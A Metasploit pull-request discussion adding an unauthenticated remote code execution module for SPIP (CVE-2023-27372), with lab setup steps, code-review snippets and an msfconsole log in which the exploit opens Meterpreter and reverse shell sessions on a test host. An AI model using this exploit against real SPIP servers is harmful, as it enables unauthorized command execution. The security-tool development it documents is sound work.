Add a module for the latest SPIP vuln
rapid7/metasploit-framework pull request #17711
Opened 2023-02-27 21:37 UTC by jvoisin

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] `wget https://git.spip.net/spip-contrib-outils/checkout/src/branch/master/checkout.php`
- [ ] `php checkout.php spip -b4.0.0 ./spip`
- [ ] `cd ./spip`
- [ ] `php -S 127.0.0.1:8080`
- [ ] Start `msfconsole`
- [ ] `use exploit/unix/webapp/spip_rce_form`
- [ ] **Verify** that the string `:"uid=1000(` is present in the output.

## TODO

- [ ] use the payload instead of hardcoding it
- [ ] write documentation

2023-02-28 14:14 UTC, just1602 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +    unless (res && res.code == 200)
Since ruby 2.3.0, you can do `res&.code == 200` if you prefer.

2023-02-28 20:23 UTC, laluka commented
Worked on this one as a rubber-ducky-debugger, for what it's worth, this exploit is quite minimal (which is perfect to lower the number of bugs) and gets the job done.
Thanks for this @jvoisin ! :white_flower:

2023-03-02 00:18 UTC, jheysel-r7 requested changes
Hey @jvoisin, thanks so much for the awesome contribution. I've made a couple minor suggestions. 

Mainly I think this would be a great opportunity to make use of the command stager functionality in metasploit. This gives the user the option to either run a unix command when exploiting the module or return a meterpreter session. More on the command stager can be read about here: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html.

Let me know if you have any questions at all regarding command stagers, I'd be happy to help in any way I could.

2023-03-02 00:18 UTC, jheysel-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +        ],
The Targets section will need to be updated when the `Msf::Exploit::CmdStager` functionality gets added

2023-03-02 00:18 UTC, jheysel-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +          'SideEffects' => []
```suggestion
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
```

Haven't checked although I would assume the activity from this module would get logged somewhere, also the command stager will leave artifacts on disk.

2023-03-02 15:13 UTC, adfoster-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +        'DisclosureDate' => '2023-02-27'
Is this meant to be Monday January 16th, 2023 ?

2023-02-27 looks like it's associated with this CVE / Blog Post which seems to be a different exploit

- https://nvd.nist.gov/vuln/detail/CVE-2023-24258
- https://blog-spip-net.translate.goog/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html?lang=fr&_x_tr_sl=ja&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp

2023-03-02 15:14 UTC, cgranleese-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +    if version =~ /^4\.2/ && version < '4.2.1'
It might be a good idea to move over to @jheysel-r7's suggestion as version comparison is much more brittle than the `Rex.version` check.

2023-03-02 15:14 UTC, cgranleese-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +        'References' => [
@todb-r7 This PR is missing a CVE, but it has been patched, would you happen to have any guidance here? Thanks.

2023-03-02 19:29 UTC, jvoisin commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +        'DisclosureDate' => '2023-02-27'
https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html?lang=fr nope, it's 27th of March 2023.

2023-03-02 19:29 UTC, jvoisin commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +          'SideEffects' => []
I wasn't sure about `IOC_IN_LOGS`, since it's a parameter-free GET request followed by a POST one.

2023-03-21 20:41 UTC, jheysel-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +        'DisclosureDate' => '2023-02-27'
I think `2023-02-27` is correct. Which just for clarity's sake was posted on the 27th of **February** 2023.

@adfoster-r7, the CVE you linked [CVE-2023-24258](https://nvd.nist.gov/vuln/detail/CVE-2023-24258) seems to be an SQLi in the `_oups`. Which might be different as this seems to be a command injection via the `oubli` post parameter. 

I think this exploit might be for: https://nvd.nist.gov/vuln/detail/CVE-2023-27372, in which case we could add this CVE.  The reason I'm not certain is this link which I assume would have been the PoC is now a 502: https://therealcoiffeur.com/c11010

2023-03-21 20:44 UTC, jheysel-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +        'References' => [
Hey @jvoisin, could you confirm if this exploit corresponds to this CVE: https://nvd.nist.gov/vuln/detail/CVE-2023-27372?

2023-03-21 20:48 UTC, jheysel-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +          [ 'URL', 'https://therealcoiffeur.com/c11010' ],
https://therealcoiffeur.com/c11010 is unfortunately returning a 502 for me atm. Was this a link to the PoC and do you think it's possible they've taken it down as per someone's request?
```suggestion
          [ 'URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html' ]
```

2023-03-22 18:57 UTC, jheysel-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +    end
This should be moved to a new method: `def execute_command(cmd, _opts = {})`

This is convention we try to follow when working with command stagers. It allows the module developer to isolate the command injection code and allows for different targets to be more easily integrated into the module. This way you can inject a single command that returns a shell (`ARCH_CMD` or `ARCH_PHP`), or this can be used to download a more sophisticated payload with a target like `ARCH_LINUX`.

Here's an example for reference: https://github.com/rapid7/metasploit-framework/blob/d6f27a8a7149d1ddefb9d5fe238fe1c0ed3913aa/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb. Thanks @jvoisin for all the work you've done this so far.

2023-03-22 18:57 UTC, jheysel-r7 commented on documentation/modules/exploit/unix/webapp/spip_rce_form.md
> +## Scenarios
This scenario should be updated to reflect the new changes / targets.

2023-03-23 18:21 UTC, jvoisin commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +        'References' => [
Yes it is.
I also added it to the module :)

2023-03-23 18:21 UTC, jvoisin commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +          [ 'URL', 'https://therealcoiffeur.com/c11010' ],
It's down temporarily, it should come back any time soon.

2023-03-27 18:54 UTC, jheysel-r7 requested changes
Hey @jvoisin, thanks for making those changes. I've made a couple more suggestions which fix the linting issue and standardizes the `execute_command` method. I was hoping they would also fix the module but I couldn't seem to get it working.

Could you please:
1. Retest the module
2. Update the Scenarios section of the documentation.

I'm not sure what preventing the shell from returning, hard to say with the link to PoC still returning a 502. Thank you!

2023-03-27 18:54 UTC, jheysel-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +  include Msf::Exploit::Remote::HttpClient
```suggestion
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck
```
Adding prepend AutoCheck will automatically run the check method before exploiting

2023-03-27 18:54 UTC, jheysel-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +    execute_command(oubli, uri, csrf)
```suggestion
    execute_command(oubli, { uri: uri, csrf: csrf })
```

2023-04-17 16:55 UTC, jheysel-r7 commented on modules/exploits/unix/webapp/spip_rce_form.rb
> +    fail_with(Msf::Exploit::Failure::UnexpectedReply, "Got an http code that isn't 200: #{res.code}.") unless res&.code == 200
```suggestion
    fail_with(Msf::Exploit::Failure::Unreachable, "The request to uri: #{uri} did not respond") unless res
    fail_with(Msf::Exploit::Failure::UnexpectedReply, "Got an http code that isn't 200: #{res.code}, when sending a request to uri: #{uri}") unless res&.code == 200
```
Just going to add this in here - you nil safe check res.code in the unless statement but then reference res.code in the body of the unless which is not nil safe.

This change prevents `Exploit failed: NoMethodError undefined method 'code' for nil:NilClass` in the event res = nil while still allowing the module to print the response code in the event it exists but is not equal to 200.

2023-04-17 17:42 UTC, jheysel-r7 approved these changes

2023-04-17 19:32 UTC, merged

2023-04-17 19:40 UTC, jheysel-r7 commented
Thanks for making all those changes @jvoisin! Testing looked great, I've squashed and merged 🚀 


```
msf6 exploit(unix/webapp/spip_rce_form) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(unix/webapp/spip_rce_form) > set rport 8000
rport => 8000
msf6 exploit(unix/webapp/spip_rce_form) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(unix/webapp/spip_rce_form) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: a4JbePyJmkqJ/6hwwumGfV8ytMpMz/U4WsgxqV5HUg76ZsdRNJ32zFfHQcvOpDDhHB7ZBn5+yPpkRCxedsLCbcuuTLru/sulTg==
[*] 172.16.199.131:8000 - Attempting to exploit...
[*] Sending stage (39927 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:43456) at 2023-04-17 15:13:23 -0400


meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 5.19.0-38-generic #39~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 17 21:16:15 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.199.131 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(unix/webapp/spip_rce_form) > set target 1
target => 1
msf6 exploit(unix/webapp/spip_rce_form) > run

[*] Started reverse TCP double handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: a4JbePyJmkqJ/6hwwumGfV8ytMpMz/U4WsgxqV5HUg76ZsdRNJ32zFfHQcvOpDDhHB7ZBn5+yPpkRCxedsLCbcuuTLru/sulTg==
[*] 172.16.199.131:8000 - Attempting to exploit...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo PRx2DFOeACZbW9jV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "PRx2DFOeACZbW9jV\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (172.16.199.1:4444 -> 172.16.199.131:44028) at 2023-04-17 15:14:25 -0400

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare)
uname -a
Linux msfuser-virtual-machine 5.19.0-38-generic #39~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 17 21:16:15 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
```

2023-04-21 14:32 UTC, dwelch-r7 commented
# Release Notes

This module exploits a PHP code injection in SPIP. The vulnerability exists in the oubli parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges